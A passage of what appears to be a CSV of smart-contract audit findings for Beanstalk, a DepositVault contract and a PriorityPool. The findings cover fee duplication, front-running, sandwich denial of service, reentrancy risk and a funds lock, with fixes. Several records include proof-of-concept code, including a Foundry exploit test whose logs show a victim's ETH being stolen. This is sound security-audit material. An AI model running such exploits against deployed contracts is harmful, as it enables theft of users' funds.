TOKEN_ID), 1, ""Victim does not have token"");\\n\\n exploiter = new FertilizerRecipient();\\n vm.deal(address(exploiter), 1 wei);\\n\\n vm.label(VICTIM, ""VICTIM"");\\n vm.deal(VICTIM, 10 ether);\\n\\n vm.label(BEANSTALK, ""Beanstalk Diamond"");\\n vm.label(FERTILIZER, ""Fertilizer"");\\n vm.label(address(exploiter), ""Exploiter"");\\n }\\n\\n function test_attack() public {\\n emit log_named_uint(""VICTIM balance before: "", VICTIM.balance);\\n emit log_named_uint(""BEANSTALK balance before: "", BEANSTALK.balance);\\n emit log_named_uint(""Exploiter balance before: "", address(exploiter).balance);\\n\\n vm.startPrank(VICTIM);\\n // approve Beanstalk to transfer Fertilizer\\n IERC1155(FERTILIZER).setApprovalForAll(BEANSTALK, true);\\n\\n // encode call to `TokenSupportFacet::transferERC1155`\\n bytes4 selector = 0x0a7e880c;\\n assertEq(IBeanstalk(BEANSTALK).facetAddress(selector), address(0x5e15667Bf3EEeE15889F7A2D1BB423490afCb527), ""Incorrect facet address/invalid function"");\\n\\n AdvancedFarmCall[] memory data = new AdvancedFarmCall[](1);\\n data[0] = AdvancedFarmCall(abi.encodeWithSelector(selector, address(FERTILIZER), address(exploiter), TOKEN_ID, 1), abi.encodePacked(bytes1(0x00)));\\n IBeanstalk(BEANSTALK).advancedFarm{value: 10 ether}(data);\\n vm.stopPrank();\\n\\n emit log_named_uint(""VICTIM balance after: "", VICTIM.balance);\\n emit log_named_uint(""BEANSTALK balance after: "", BEANSTALK.balance);\\n emit log_named_uint(""Exploiter balance after: "", address(exploiter).balance);\\n }\\n}\\n```\\n\\nAs can be seen in the output below, the exploiter is able to steal the excess 10 Ether sent by the victim:\\n```\\nRunning 1 test for test/FarmFacetPoC.t.sol:FarmFacetPoC\\n[PASS] test_attack() (gas: 183060)\\nLogs:\\n VICTIM balance before: : 10000000000000000000\\n BEANSTALK balance before: : 0\\n Exploiter balance before: : 1\\n data.length: 1\\n entered __doSafeTransferAcceptanceCheck\\n to is contract, calling hook\\n entered exploiter onERC1155Received\\n exploiting farm facet farm call\\n data.length: 0\\n entered exploiter fallback\\n Beanstalk balance: 0\\n Exploiter balance: 10000000000000000001\\n finished exploiting farm facet farm call\\n VICTIM balance after: : 0\\n BEANSTALK balance after: : 0\\n Exploiter balance after: : 10000000000000000001\\n```\\n",```\\n// signals to Beanstalk functions that they should not refund Eth\\n// at the end of the function because the function is wrapped in a Farm function\\nmodifier withEth() {\\n if (msg.value > 0) s.isFarm = 2;\\n _;\\n if (msg.value > 0) {\\n s.isFarm = 1;\\n LibEth.refundEth();\\n }\\n}\\n```\\n +Duplicate fees will be paid by `LibTransfer::transferFee` when transferring fee-on-transfer tokens with `EXTERNAL_INTERNAL` 'from' mode and `EXTERNAL` 'to' mode,medium,"Beanstalk utilizes an internal virtual balance system that significantly reduces transaction fees when using tokens that are intended to remain within the protocol. `LibTransfer` achieves this by managing every transfer between accounts, considering both the origin 'from' and destination 'to' modes of the in-flight funds. As a result, there are four types of transfers based on the source of the funds (from mode):\\nEXTERNAL: The sender will not use their internal balances for the operation.\\nINTERNAL: The sender will use their internal balances for the operation.\\nEXTERNAL_INTERNAL: The sender will attempt to utilize their internal balance to transfer all desired funds. If funds remain to be sent, their externally owned funds will be utilized to cover the difference.\\nINTERNAL_TOLERANT: The sender will utilize their internal balances for the operation. With insufficient internal balance, the operation will continue (without reverting) with this reduced amount. It is, therefore, imperative to always check the return value of LibTransfer functions to continue the execution of calling functions with the true utilized amount, especially in this internal tolerant case.\\nThe current implementation of `LibTransfer::transferToken` for `(from mode: EXTERNAL ; to mode: EXTERNAL)` ensures a safe transfer operation from the sender to the recipient:\\n```\\n// LibTransfer::transferToken\\nif (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {\\n uint256 beforeBalance = token.balanceOf(recipient);\\n token.safeTransferFrom(sender, recipient, amount);\\n return token.balanceOf(recipient).sub(beforeBalance);\\n}\\namount = receiveToken(token, amount, sender, fromMode);\\nsendToken(token, amount, recipient, toMode);\\nreturn amount;\\n```\\n\\nPerforming this operation allows duplication of fee-on-transfer token fees to be avoided if funds are first transferred to the contract and then to the recipient; however, `LibTransfer::transferToken` balance will incur double the fee if this function is used for `(from mode: EXTERNAL_INTERNAL ; to mode: EXTERNAL)` when the internal balance is insufficient cover the full transfer amount, given that:\\nThe remaining token balance would first be transferred to the Beanstalk Diamond, incurring fees.\\nThe remaining token balance would then be transferred to the recipient, incurring fees again.","Add an internal function `LibTransfer::handleFromExternalInternalToExternalTransfer` to handle this case to avoid duplication of fees. For instance:\\n```\\nfunction handleFromExternalInternalToExternalTransfer(\\n IERC20 token,\\n address sender,\\n address recipient,\\n address amount\\n) internal {\\n uint256 amountFromInternal = LibBalance.decreaseInternalBalance(\\n sender,\\n token,\\n amount,\\n true // allowPartial to avoid revert\\n );\\n uint256 pendingAmount = amount - amountFromInternal;\\n if (pendingAmount != 0) {\\n token.safeTransferFrom(sender, recipient, pendingAmount);\\n }\\n token.safeTransfer(sender, amountFromInternal);\\n}\\n```\\n\\nThen consider the use of this new function in LibTransfer::transferToken:\\n```\\n function transferToken(\\n IERC20 token,\\n address sender,\\n address recipient,\\n uint256 amount,\\n From fromMode,\\n To toMode\\n ) internal returns (uint256 transferredAmount) {\\n// Remove the line below\\n if (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {\\n// Add the line below\\n if (toMode == To.EXTERNAL) {\\n// Add the line below\\n if (fromMode == From.EXTERNAL) {\\n uint256 beforeBalance = token.balanceOf(recipient);\\n token.safeTransferFrom(sender, recipient, amount);\\n return token.balanceOf(recipient).sub(beforeBalance);\\n// Add the line below\\n } else if (fromMode == From.EXTERNAL_INTERNAL) {\\n// Add the line below\\n handleFromExternalInternalToExternalTransfer(token, sender, recipient, amount);\\n// Add the line below\\n return amount;\\n// Add the line below\\n }\\n }\\n amount = receiveToken(token, amount, sender, fromMode);\\n sendToken(token, amount, recipient, toMode);\\n return amount;\\n }\\n```\\n","`LibTransfer::transferToken` will incur duplicate fees if this function is used for `(from mode: EXTERNAL_INTERNAL ; to mode: EXTERNAL)` with fee-on-transfer tokens if the internal balance is not sufficient to cover the full transfer amount.\\nEven though Beanstalk currently does not impose any fees on token transfers, USDT is associated with the protocol, and its contract has already introduced logic to implement a fee on token transfer mechanism if ever desired in the future. Considering that the duplication of fees implies a loss of funds, but also taking into account the low likelihood of this issue occurring, the severity assigned to this issue is MEDIUM.","```\\n// LibTransfer::transferToken\\nif (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {\\n uint256 beforeBalance = token.balanceOf(recipient);\\n token.safeTransferFrom(sender, recipient, amount);\\n return token.balanceOf(recipient).sub(beforeBalance);\\n}\\namount = receiveToken(token, amount, sender, fromMode);\\nsendToken(token, amount, recipient, toMode);\\nreturn amount;\\n```\\n" +"Flood mechanism is susceptible to DoS attacks by a frontrunner, breaking re-peg mechanism when BEAN is above 1 USD",medium,"A call to the BEAN/3CRV Metapool is made withinWeather::sop, swapping Beans for 3CRV, to aid in returning Beanstalk to peg via a mechanism known as ""Flood"" (formerly Season of Plenty, or sop) when the Beanstalk Farm has been ""Oversaturated"" ($P > 1$; $Pod Rate < 5%$) for more than one Season and for each additional Season in which it continues to be Oversaturated. This is achieved by minting additional Beans and selling them directly on Curve, distributing the proceeds from the sale as 3CRV to Stalkholders.\\nUnlike `Oracle::stepOracle`, which returns the aggregate time-weighted `deltaB` value across both the BEAN/3CRV Metapool and BEAN/ETH Well, the current shortage/excess of Beans during the handling of Rain in `Weather::stepWeather` are calculated directly from the Curve Metapool via `LibBeanMetaCurve::getDeltaB`.\\n```\\n function getDeltaB() internal view returns (int256 deltaB) {\\n uint256[2] memory balances = C.curveMetapool().get_balances();\\n uint256 d = getDFroms(balances);\\n deltaB = getDeltaBWithD(balances[0], d);\\n }\\n```\\n\\nThis introduces the possibility that a long-tail MEV bot could perform a denial-of-service attack on the Flood mechanism by performing a sandwich attack on `SeasonFacet::gm` whenever the conditions are met such that `Weather::sop` is called. The attacker would first front-run the transaction by selling BEAN for 3CRV, bringing the price of BEAN back to peg, which could result in `newBeans <= 0`, thus bypassing the subsequent logic, and then back-running to repurchase their sold BEAN effectively maintaining the price of BEAN above peg.\\nThe cost for performing this attack is 0.08% of the utilized funds. However, not accounting for other mechanisms (such as Convert) designed to return the price of Bean to peg, Beanstalk would need to wait the Season duration of 1 hour before making another effective `SeasonFacet::gm`, provided that the previous transaction did not revert. In the subsequent call, the attacker can replicate this action at the same cost, and it is possible that the price of BEAN may have increased further during this hour.","Consider the use of an oracle to determine how many new Beans should be minted and sold for 3CRV. This implies the following modification:\\n```\\n function sop() private {\\n// Remove the line below\\n int256 newBeans = LibBeanMetaCurve.getDeltaB();\\n// Add the line below\\n int256 currentDeltaB = LibBeanMetaCurve.getDeltaB();\\n// Add the line below\\n (int256 deltaBFromOracle,) = // Remove the line below\\n LibCurveMinting.twaDeltaB();\\n// Add the line below\\n // newBeans = max(currentDeltaB, deltaBFromOracle)\\n// Add the line below\\n newBeans = currentDeltaB > deltaBFromOracle ? currentDeltaB : deltaBFromOracle;\\n\\n if (newBeans <= 0) return;\\n\\n uint256 sopBeans = uint256(newBeans);\\n uint256 newHarvestable;\\n\\n // Pay off remaining Pods if any exist.\\n if (s.f.harvestable < s.r.pods) {\\n newHarvestable = s.r.pods // Remove the line below\\n s.f.harvestable;\\n s.f.harvestable = s.f.harvestable.add(newHarvestable);\\n C.bean().mint(address(this), newHarvestable.add(sopBeans));\\n } else {\\n C.bean().mint(address(this), sopBeans);\\n }\\n\\n // Swap Beans for 3CRV.\\n uint256 amountOut = C.curveMetapool().exchange(0, 1, sopBeans, 0);\\n\\n rewardSop(amountOut);\\n emit SeasonOfPlenty(s.season.current, amountOut, newHarvestable);\\n }\\n```\\n\\nThe motivation for using the maximum value between the current `deltaB` and that calculated from time-weighted average balances is that the action of an attacker increasing `deltaB` to carry out a sandwich attack would be nonsensical as excess Bean minted by the Flood mechanism would be sold for additional 3CRV. In this way, anyone attempting to increase `deltaB` would essentially be giving away their 3CRV LP tokens to Stalkholders. Therefore, by using the maximum `deltaB`, it is ensured that the impact of any attempt to execute the attack described above would be minimal and economically unattractive. If no one attempts the attack, the behavior will remain as originally intended.\\n\\clearpage",Attempts by Beanstalk to restore peg via the Flood mechanism are susceptible to denial-of-service attacks by a sufficiently well-funded sandwich attacker through frontrunning of `SeasonFacet::gm`.,"```\\n function getDeltaB() internal view returns (int256 deltaB) {\\n uint256[2] memory balances = C.curveMetapool().get_balances();\\n uint256 d = getDFroms(balances);\\n deltaB = getDeltaBWithD(balances[0], d);\\n }\\n```\\n" +"Spender can front-run calls to modify token allowances, resulting in DoS and/or spending more than was intended",low,"When updating the allowance for a spender that is less than the value currently set, a well-known race condition allows the spender to spend more than the caller intended by front-running the transaction that performs this update. Due to the nature of the `ERC20::approve` implementation and other variants used within the Beanstalk system, which update the mapping in storage corresponding to the given allowance, the spender can spend both the existing allowance plus any 'additional' allowance set by the in-flight transaction.\\nFor example, consider the scenario:\\nAlice approves Bob 100 tokens.\\nAlice later decides to decrease this to 50.\\nBob sees this transaction in the mempool and front-runs, spending his 100 token allowance.\\nAlice's transaction executes, and Bob's allowance is updated to 50.\\nBob can now spend an additional 50 tokens, resulting in a total of 150 rather than the maximum of 50 as intended by Alice.\\nSpecific functions named `decreaseTokenAllowance`, intended to decrease approvals for a token spender, have been introduced to both the `TokenFacet` and the `ApprovalFacet`. `PodTransfer::decrementAllowancePods` similarly exists for the Pod Marketplace.\\nThe issue, however, with these functions is that they are still susceptible to front-running in the sense that a malicious spender could force their execution to revert, violating the intention of the caller to decrease their allowance as they continue to spend that which is currently set. Rather than simply setting the allowance to zero if the caller passes an amount to subtract that is larger than the current allowance, these functions halt execution and revert. This is due to the following line of shared logic:\\n```\\nrequire(\\n currentAllowance >= subtractedValue,\\n ""Silo: decreased allowance below zero""\\n);\\n```\\n\\nConsider the following scenario:\\nAlice approves Bob 100 tokens.\\nAlice later decides to decrease this to 50.\\nBob sees this transaction in the mempool and front-runs, spending 60 of his 100 token allowance.\\nAlice's transaction executes, but reverts given Bob's allowance is now 40.\\nBob can now spend the remaining 40 tokens, resulting in a total of 100 rather than the decreased amount of 50 as intended by Alice.\\nOf course, in this scenario, Bob could have just as easily front-run Alice's transaction and spent his entire existing allowance; however, the fact that he is able to perform a denial-of-service attack results in a degraded user experience. Similar to setting maximum approvals, these functions should handle maximum approval revocations to mitigate against this issue.",Set the allowance to zero if the intended subtracted value exceeds the current allowance.\\n\\clearpage,"Requiring that the intended subtracted allowance does not exceed the current allowance results in a degraded user experience and, more significantly, their loss of funds due to a different route to the same approval front-running attack vector.","```\\nrequire(\\n currentAllowance >= subtractedValue,\\n ""Silo: decreased allowance below zero""\\n);\\n```\\n" +Non-standard ERC20 tokens are not supported,medium,"The protocol implemented a function `deposit()` to allow users to deposit.\\n```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, ""Deposit amount must be greater than 0"");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), ""Token address must be 0x0 for ETH deposits"");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), ""Token address must not be 0x0 for token deposits"");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));//@audit-issue fee-on-transfer, rebalancing tokens will cause problems\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n\\nLooking at the line L49, we can see that the protocol assumes `amount` of tokens were transferred. But this does not hold true for some non-standard ERC20 tokens like fee-on-transfer tokens or rebalancing tokens. (Refer to here about the non-standard weird ERC20 tokens)\\nFor example, if token incurs fee on transfer, the actually transferred `amount` will be less than the provided parameter `amount` and the `deposits` will have a wrong state value. Because the current implementation only allows full withdrawal, this means the tokens will be locked in the contract permanently.","We recommend adding another field in the `Deposit` structure, say `balance`\\nWe recommend allow users to withdraw partially and decrease the `balance` field appropriately for successful withdrawals. If these changes are going to be made, we note that there are other parts that need changes. For example, the withdraw function would need to be updated so that it does not require the withdrawal amount is same to the original deposit amount.","If non-standard ERC20 tokens are used, the tokens could be locked in the contract permanently.","```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, ""Deposit amount must be greater than 0"");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), ""Token address must be 0x0 for ETH deposits"");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), ""Token address must not be 0x0 for token deposits"");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));//@audit-issue fee-on-transfer, rebalancing tokens will cause problems\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n" +The deposit function is not following CEI pattern,low,"The protocol implemented a function `deposit()` to allow users to deposit.\\n```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, ""Deposit amount must be greater than 0"");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), ""Token address must be 0x0 for ETH deposits"");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), ""Token address must not be 0x0 for token deposits"");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);//@audit-issue against CEI pattern\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n\\nLooking at the line L47, we can see that the token transfer happens before updating the accounting state of the protocol against the CEI pattern. Because the protocol intends to support all ERC20 tokens, the tokens with hooks (e.g. ERC777) can be exploited for reentrancy. Although we can not verify an exploit that causes explicit loss due to this, it is still highly recommended to follow CEI pattern to prevent possible reentrancy attack.",Handle token transfers after updating the `deposits` state.,,"```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, ""Deposit amount must be greater than 0"");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), ""Token address must be 0x0 for ETH deposits"");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), ""Token address must not be 0x0 for token deposits"");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);//@audit-issue against CEI pattern\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n" +Nonstandard usage of nonce,low,"The protocol implemented two withdraw functions `withdrawDeposit()` and `withdraw()`. While the function `withdrawDeposit()` is designed to be used by the depositor themselves, the function `withdraw()` is designed to be used by anyone who has a signature from the depositor. The function `withdraw()` has a parameter `nonce` but the usage of this param is not aligned with the general meaning of `nonce`.\\n```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, ""Invalid deposit index"");\\n Deposit storage depositToWithdraw = deposits[nonce];//@audit-info non aligned with common understanding of nonce\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, ""Invalid signature"");\\n require(!usedWithdrawalHashes[withdrawalHash], ""Withdrawal has already been executed"");\\n require(amount == depositToWithdraw.amount, ""Withdrawal amount must match deposit amount"");\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n\\nIn common usage, `nonce` is used to track the latest transaction from the EOA and generally it is increased on the user's transaction. It can be effectively used to invalidate the previous signature by the signer. But looking at the current implementation, the parameter `nonce` is merely used as an index to refer the `deposit` at a specific index.\\nThis is a bad naming and can confuse the users.","If the protocol intended to provide a kind of invalidation mechanism using the nonce, there should be a separate mapping that stores the nonce for each user. The current nonce can be used to generate a signature and a depositor should be able to increase the nonce to invalidate the previous signatures. Also the nonce would need to be increased on every successful call to `withdraw()` to prevent replay attack. Please note that with this remediation, the mapping `usedWithdrawalHashes` can be removed completely because the hash will be always decided using the latest nonce and the nonce will be invalidated automatically (because it increases on successful call).\\nIf this is not what the protocol intended, the parameter nonce can be renamed to `depositIndex` as implemented in the function `withdrawDeposit()`.",,"```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, ""Invalid deposit index"");\\n Deposit storage depositToWithdraw = deposits[nonce];//@audit-info non aligned with common understanding of nonce\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, ""Invalid signature"");\\n require(!usedWithdrawalHashes[withdrawalHash], ""Withdrawal has already been executed"");\\n require(amount == depositToWithdraw.amount, ""Withdrawal amount must match deposit amount"");\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n" +Unnecessary parameter amount in withdraw function,low,"The function `withdraw()` has a parameter `amount` but we don't understand the necessity of this parameter. At line L67, the `amount` is required to be the same to the whole deposit `amount`. This means the user does not have a flexibility to choose the withdraw `amount`, after all it means the parameter was not necessary at all.\\n```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, ""Invalid deposit index"");\\n Deposit storage depositToWithdraw = deposits[nonce];\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, ""Invalid signature"");\\n require(!usedWithdrawalHashes[withdrawalHash], ""Withdrawal has already been executed"");\\n require(amount == depositToWithdraw.amount, ""Withdrawal amount must match deposit amount"");//@audit-info only full withdrawal is allowed\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n","If the protocol intends to only allow full withdrawal, this parameter can be removed completely (that will help save gas as well). Unnecessary parameters increase the complexity of the function and more error prone.",,"```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, ""Invalid deposit index"");\\n Deposit storage depositToWithdraw = deposits[nonce];\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, ""Invalid signature"");\\n require(!usedWithdrawalHashes[withdrawalHash], ""Withdrawal has already been executed"");\\n require(amount == depositToWithdraw.amount, ""Withdrawal amount must match deposit amount"");//@audit-info only full withdrawal is allowed\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n" +Functions not used internally could be marked external,low,"Using proper visibility modifiers is a good practice to prevent unintended access to functions. Furthermore, marking functions as `external` instead of `public` can save gas.\\n```\\nFile: DepositVault.sol\\n\\n function deposit(uint256 amount, address tokenAddress) public payable\\n\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public\\n\\n function withdrawDeposit(uint256 depositIndex) public\\n```\\n",Consider change the visibility modifier to `external` for the functions that are not used internally.,,"```\\nFile: DepositVault.sol\\n\\n function deposit(uint256 amount, address tokenAddress) public payable\\n\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public\\n\\n function withdrawDeposit(uint256 depositIndex) public\\n```\\n" +User's funds are locked temporarily in the PriorityPool contract,medium,"The protocol intended to utilize the deposit queue for withdrawal to minimize the stake/unstake interaction with the staking pool. When a user wants to withdraw, they are supposed to call the function `PriorityPool::withdraw()` with the desired amount as a parameter.\\n```\\nfunction withdraw(uint256 _amount) external {//@audit-info LSD token\\n if (_amount == 0) revert InvalidAmount();\\n IERC20Upgradeable(address(stakingPool)).safeTransferFrom(msg.sender, address(this), _amount);//@audit-info get LSD token from the user\\n _withdraw(msg.sender, _amount);\\n}\\n```\\n\\nAs we can see in the implementation, the protocol pulls the `_amount` of LSD tokens from the user first and then calls `_withdraw()` where the actual withdrawal utilizing the queue is processed.\\n```\\nfunction _withdraw(address _account, uint256 _amount) internal {\\n if (poolStatus == PoolStatus.CLOSED) revert WithdrawalsDisabled();\\n\\n uint256 toWithdrawFromQueue = _amount <= totalQueued ? _amount : totalQueued;//@audit-info if the queue is not empty, we use that first\\n uint256 toWithdrawFromPool = _amount - toWithdrawFromQueue;\\n\\n if (toWithdrawFromQueue != 0) {\\n totalQueued -= toWithdrawFromQueue;\\n depositsSinceLastUpdate += toWithdrawFromQueue;//@audit-info regard this as a deposit via the queue\\n }\\n\\n if (toWithdrawFromPool != 0) {\\n stakingPool.withdraw(address(this), address(this), toWithdrawFromPool);//@audit-info withdraw from pool into this contract\\n }\\n\\n //@audit-warning at this point, toWithdrawFromQueue of LSD tokens remain in this contract!\\n\\n token.safeTransfer(_account, _amount);//@audit-info\\n emit Withdraw(_account, toWithdrawFromPool, toWithdrawFromQueue);\\n}\\n```\\n\\nBut looking in the function `_withdraw()`, only `toWithdrawFromPool` amount of LSD tokens are withdrawn (burn) from the staking pool and `toWithdrawFromQueue` amount of LSD tokens remain in the `PriorityPool` contract. On the other hand, the contract tracks the queued amount for users by the mapping `accountQueuedTokens` and this leads to possible mismatch in the accounting. Due to this mismatch, a user's LSD tokens can be locked in the `PriorityPool` contract while the user sees his queued amount (getQueuedTokens()) is positive. Users can claim the locked LSD tokens once the function `updateDistribution` is called. Through the communication with the protocol team, it is understood that `updateDistribution` is expected to be called probably every 1-2 days unless there were any new deposits into the staking pool. So it means user's funds can be locked temporarily in the contract which is unfair for the user.",Consider add a feature to allow users to withdraw LSD tokens from the contract directly.,"User's LSD tokens can be locked temporarily in the PriorityPool contract\\nProof of Concept:\\n```\\n it('Cyfrin: user funds can be locked temporarily', async () => {\\n // try deposit 1500 while the capacity is 1000\\n await strategy.setMaxDeposits(toEther(1000))\\n await sq.connect(signers[1]).deposit(toEther(1500), true)\\n\\n // 500 ether is queued for accounts[1]\\n assert.equal(fromEther(await stakingPool.balanceOf(accounts[1])), 1000)\\n assert.equal(fromEther(await sq.getQueuedTokens(accounts[1], 0)), 500)\\n assert.equal(fromEther(await token.balanceOf(accounts[1])), 8500)\\n assert.equal(fromEther(await sq.totalQueued()), 500)\\n assert.equal(fromEther(await stakingPool.balanceOf(sq.address)), 0)\\n\\n // at this point user calls withdraw (maybe by mistake?)\\n // withdraw swipes from the queue and the deposit room stays at zero\\n await stakingPool.connect(signers[1]).approve(sq.address, toEther(500))\\n await sq.connect(signers[1]).withdraw(toEther(500))\\n\\n // at this point getQueueTokens[accounts[1]] does not change but the queue is empty\\n // user will think his queue position did not change and he can simply unqueue\\n assert.equal(fromEther(await stakingPool.balanceOf(accounts[1])), 500)\\n assert.equal(fromEther(await sq.getQueuedTokens(accounts[1], 0)), 500)\\n assert.equal(fromEther(await token.balanceOf(accounts[1])), 9000)\\n assert.equal(fromEther(await sq.totalQueued()), 0)\\n // NOTE: at this point 500 ethers of LSD tokens are locked in the queue contract\\n assert.equal(fromEther(await stakingPool.balanceOf(sq.address)), 500)\\n\\n // but unqueueTokens fails because actual totalQueued is zero\\n await expect(sq.connect(signers[1]).unqueueTokens(0, 0, [], toEther(500))).to.be.revertedWith(\\n 'InsufficientQueuedTokens()'\\n )\\n\\n // user's LSD tokens are still locked in the queue contract\\n await stakingPool.connect(signers[1]).approve(sq.address, toEther(500))\\n await sq.connect(signers[1]).withdraw(toEther(500))\\n assert.equal(fromEther(await stakingPool.balanceOf(accounts[1])), 0)\\n assert.equal(fromEther(await sq.getQueuedTokens(accounts[1], 0)), 500)\\n assert.equal(fromEther(await token.balanceOf(accounts[1])), 9500)\\n assert.equal(fromEther(await sq.totalQueued()), 0)\\n assert.equal(fromEther(await stakingPool.balanceOf(sq.address)), 500)\\n\\n // user might try withdraw again but it will revert because user does not have any LSD tokens\\n await stakingPool.connect(signers[1]).approve(sq.address, toEther(500))\\n await expect(sq.connect(signers[1]).withdraw(toEther(500))).to.be.revertedWith(\\n 'Transfer amount exceeds balance'\\n )\\n\\n // in conclusion, user's LSD tokens are locked in the queue contract and he cannot withdraw them\\n // it is worth noting that the locked LSD tokens are credited once updateDistribution is called\\n // so the lock is temporary\\n })\\n```\\n","```\\nfunction withdraw(uint256 _amount) external {//@audit-info LSD token\\n if (_amount == 0) revert InvalidAmount();\\n IERC20Upgradeable(address(stakingPool)).safeTransferFrom(msg.sender, address(this), _amount);//@audit-info get LSD token from the user\\n _withdraw(msg.sender, _amount);\\n}\\n```\\n" +Each Well is responsible for ensuring that an `update` call cannot be made with a reserve of 0,high,"The current implementation of `GeoEmaAndCumSmaPump` assumes each well will call `update()` with non-zero reserves, as commented at the beginning of the file:\\n```\\n/**\\n * @title GeoEmaAndCumSmaPump\\n * @author Publius\\n * @notice Stores a geometric EMA and cumulative geometric SMA for each reserve.\\n * @dev A Pump designed for use in Beanstalk with 2 tokens.\\n *\\n * This Pump has 3 main features:\\n * 1. Multi-block MEV resistence reserves\\n * 2. MEV-resistant Geometric EMA intended for instantaneous reserve queries\\n * 3. MEV-resistant Cumulative Geometric intended for SMA reserve queries\\n *\\n * Note: If an `update` call is made with a reserve of 0, the Geometric mean oracles will be set to 0.\\n * Each Well is responsible for ensuring that an `update` call cannot be made with a reserve of 0.\\n */\\n```\\n\\nHowever, there is no actual requirement in `Well` to enforce pump updates with valid reserve values. Given that `GeoEmaAndCumSmaPump` restricts values to a minimum of 1 to prevent issues with the geometric mean, that the TWA values are not truly representative of the reserves in the `Well`, we believe it is worse than reverting in this case, although a `ConstantProduct2` `Well` can have zero reserves for either token via valid transactions.\\n```\\nGeoEmaAndCumSmaPump.sol\\n for (uint i; i < length; ++i) {\\n // Use a minimum of 1 for reserve. Geometric means will be set to 0 